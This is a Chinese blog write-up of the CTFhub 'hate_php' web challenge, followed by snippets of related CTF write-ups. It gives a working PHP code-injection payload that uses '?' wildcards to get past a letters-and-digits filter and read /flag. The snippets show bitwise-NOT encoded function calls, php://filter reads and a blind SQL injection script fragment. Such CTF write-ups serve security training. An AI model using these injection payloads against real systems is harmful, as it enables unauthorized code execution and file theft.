【CTFhub】——hate_php2021

最新推荐文章于 2024-11-17 21:18:16 发布
原创 最新推荐文章于 2024-11-17 21:18:16 发布 · 1.4k 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全

本文介绍了一种通过使用特殊字符“?”来绕过禁用字符限制的方法,并展示了如何构造payload来执行特定命令,例如读取文件。文章还涵盖了PHP语法格式、正则表达式的基础知识以及如何在网页源码中查找所需内容。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在这里插入图片描述
首先它进行了一个正则匹配,A~Z的26个字母大写,a ~ z的26个字母小写,0 ~9这十个数字 都被禁用了
那么我们可以用?来代替

先闭合前面的php语句再开一个新语句传入我们要执行的内容
格式如下:

/?code=?><?=`/???/???%20/????`?>

即 /bin/cat(空格)/flag
在这里插入图片描述

然后会发现在网页源码界面中出现了很多东西
在这里插入图片描述我们查找flag字段的内容
ctrl+F键 搜素flag
发现没有我们想要的,鉴于此平台的flag提交格式,我们搜索ctfhub试试
在这里插入图片描述成功

知识点

用到了?代表字符进行绕过的知识
熟悉了php语法格式
掌握了正则表达式
掌握了在源码中搜索自己想要的内容的方法

2020第五空间 hate-php rosb 交流
Rashu99's blog
06-27 2407
hate-php 取反绕过对字母和数字的过滤 php在线运行 <?php echo urlencode(~'highlight_file'); //%97%96%98%97%93%96%98%97%8B%A0%99%96%93%9A echo "\n"; echo urlencode(~'flag.php'); //%99%93%9E%98%D1%8F%97%8F ?> /?code=(~%97%96%98%97%93%96%98%97%8B%A0%99%96%93%9A)(~%99%9
第五空间 hate_php
weixin_53955759的博客
09-30 1754
打开环境源码如下 正则匹配过滤了flag . p h / ; " ' ` | [ ] _ 绕过正则匹配的方法可以用两次取反urlencode编码来绕过它 看了wp,在php7以后可以用($a)();来执行函数 它会先执行($a)里面的函数,之后在执行();里的函数 那么就用highlight_file来返回flag.php的内容 ...
ctfhub hate_php
m0_57954651的博客
11-15 472
闭合前面的php 同时执行我们后面构造想要执行的内容。首先进行了一个正则匹配 过滤掉了A~Z的26个字母大写 a ~ z的26个字母小写 0 ~9这十个数字。preg_match函数。我们需要构造语句绕过。
CTFHUB web-hate_php
m0_57954651的博客
09-05 1700
打开题目 一篇代码 先进行代码审计 看到PHP正则表达式 preg_match 显然在传参时 它会进行过滤 过滤后面括号中的关键字和特殊符号 第二个正则表达式也会过滤PHP的内置函数 即使我们找到了某个函数恰好可以绕过第一个 但也过不去第二个过滤 函数 get_defined_functions 所以这里我们利用异或或者取反来绕过 一般flag文件都会存放在根目录下 但是这里我们知道在哪 所以尝试一下 使用print_r函数 进行目录扫描 利用在线
CTFHubhate_php 2020 函数绕过
manerzi的博客
11-03 888
CTFHubhate_php 2020 函数绕过
CTFHub Web真题(3星-6星)
qq_43936524的博客
05-20 2304
三星难度Web题 afr-2 afr-1 提示文件包含 输入hello 回显hello world! 输入flag 回显no no no 又试了几个输入无回显 可以猜测输入的内容添加了后缀后显示出了文件内容 采用 php://filter/read=convert.base64-encode/resource=flag 成功读取flag.php内容 解码后得到flag n1book{afr_1_solved} checkin 扫目录只扫出了index.php一个页面,抓取响应包发现有flag字段
CTFHUB历年真题练习
qq_51558360的博客
10-11 1625
WebsiteManger 考点 布尔盲注、SSRF 尝试了一般登录方法没有反应。查看源码发现sql注入的利用点在图片上 盲注脚本 import string from requests import * allstr = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\]^_`{|}~' myurl = 'http://challenge-1993b
第三届阿里云算法赛_i_hate_mcdonalds团队_解决方案_3rd_security_competition.zip
09-05
团队名为“i_hate_mcdonalds”的参赛者提交了他们的解决方案,这表明他们对食品安全或品牌情感可能有着特别的解读,但更可能的是,这是一个为了比赛而随意选择的团队名,以吸引注意或作为一种独特的团队标识。...
no_hate_temp
03-26
no_hate_temp 一个新的Flutter应用程序。 入门 该项目是Flutter应用程序的起点。 如果这是您的第一个Flutter项目,那么有一些资源可以帮助您入门: 要获得Flutter入门方面的帮助,请查看我们的,其中提供了教程,...
twitter_hate_detector-app
04-01
【标题】"twitter_hate_detector-app" 是一个基于Python的应用程序,主要目的是检测Twitter上的仇恨言论。这个项目可能是一个自然语言处理(NLP)的实践,用于监测社交媒体上的有害或歧视性内容,以促进网络环境的...
CTFHub-hate_php
最新发布
九尾ww的博客
11-17 378
用取反操作,发现环境限制,也不行。利用通配符来匹配文件路径。不能用定义变量的做法。
2021-第五届世界智能大会-「津门杯」国际网络安全创新大赛-Web-hate_php
weixin_40872714的博客
03-29 2667
2021-第五届世界智能大会-「津门杯」国际网络安全创新大赛-Web-hate_php 打开网址直接告诉你过滤的代码,把字母数字和$、_、@都过滤了,直接放弃 然后百度搜了这道题的答案,感觉发现了新大陆一样,下面是相关的几篇文章,强烈推荐阅读: 过滤了大写字母和数字的绕过方法: https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html 过滤了大小写字母、数字、‘$’和‘_’ https://www.leavesongs.co
-Web-hate_php
2301_80113257的博客
06-29 249
代码审计后,发现对输入code进行了正则表达式匹配,过滤了英文大小写字母、数字和_$@三个特殊字符。本题的关键就是绕过正则匹配,执行eval()函数。读取到源码发现存在如下函数(我没找到?最后直接读取flag文件。
[RoarCTF 2019]Easy Calc
weixin_42346836的博客
10-16 476
查看源码发现有一个页面,直接访问 源码: <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^']; foreach ($blacklis
CTFHub WP PHP-FPM
m0_62879498的博客
04-09 904
CTFHub WP PHP-FPM PHP-FPM未授权访问漏洞 早期的web服务器只能处理html等静态服务器,但是随着 技术的发展出现的动态语言,web服务器无法处理。这时候出现了各种语言的解释器,但是web服务器如何于语言解释器进行沟通,如何去判断是什么语言,这时候 cgi协议应运而生。只要我们按照cgi协议去编写代码,就可以被服务器识别。 但是 web服务器每收到一个请求,都会去请求一个 cgi程序 ,解析完成结束进程。这样的话,假如请求次数过多,每一个请求都会进行一次 开启、结束,造成了资源的浪费
CTFHub-Web进阶-PHP
qq_68186313的博客
08-29 488
先上通过截图T^T。
ctfhub php://input
m0_62094846的博客
12-14 594
分析代码可知,可以用php:// 再抓包,然后就可以用命令查看flag
ctfhub——php://input
At0m的博客
01-14 7776
首先这道题 有一些知识需要了解。参考 《php伪协议实现命令执行的七种姿势》《php伪协议总结》 首先看一下代码,截取字符串前六个字符需要 与 php://相等,也就是file变量的值 的前六个字符需要与 php://相等。 所以写个题应该是要用到php伪协议。 有一个例子看一下 php伪协议该怎么用。 16年华山杯,源码如下: <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($u
ctfhub-web进阶-shellshock(PHP学习)
qq_62078839的博客
07-09 1477
使用条件:该方法利用的bash中的一个老漏洞,即Bash Shellshock 破壳漏洞(CVE-2014-6271)。该漏洞的原因是Bash使用的环境变量是通过函数名称来调用的,导致该漏洞出现是以开头定义的环境变量在命令 ENV 中解析成函数后,Bash执行并未退出,而是继续解析并执行shell命令。而其核心的原因在于在输入的过滤中没有严格限制边界,也没有做出合法化的参数判断。一般函数体内的代码不会被执行,但破壳漏洞会错误的将”{}”花括号外的命令进行执行。PHP里的某些函数能调用popen或其他能够派生
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值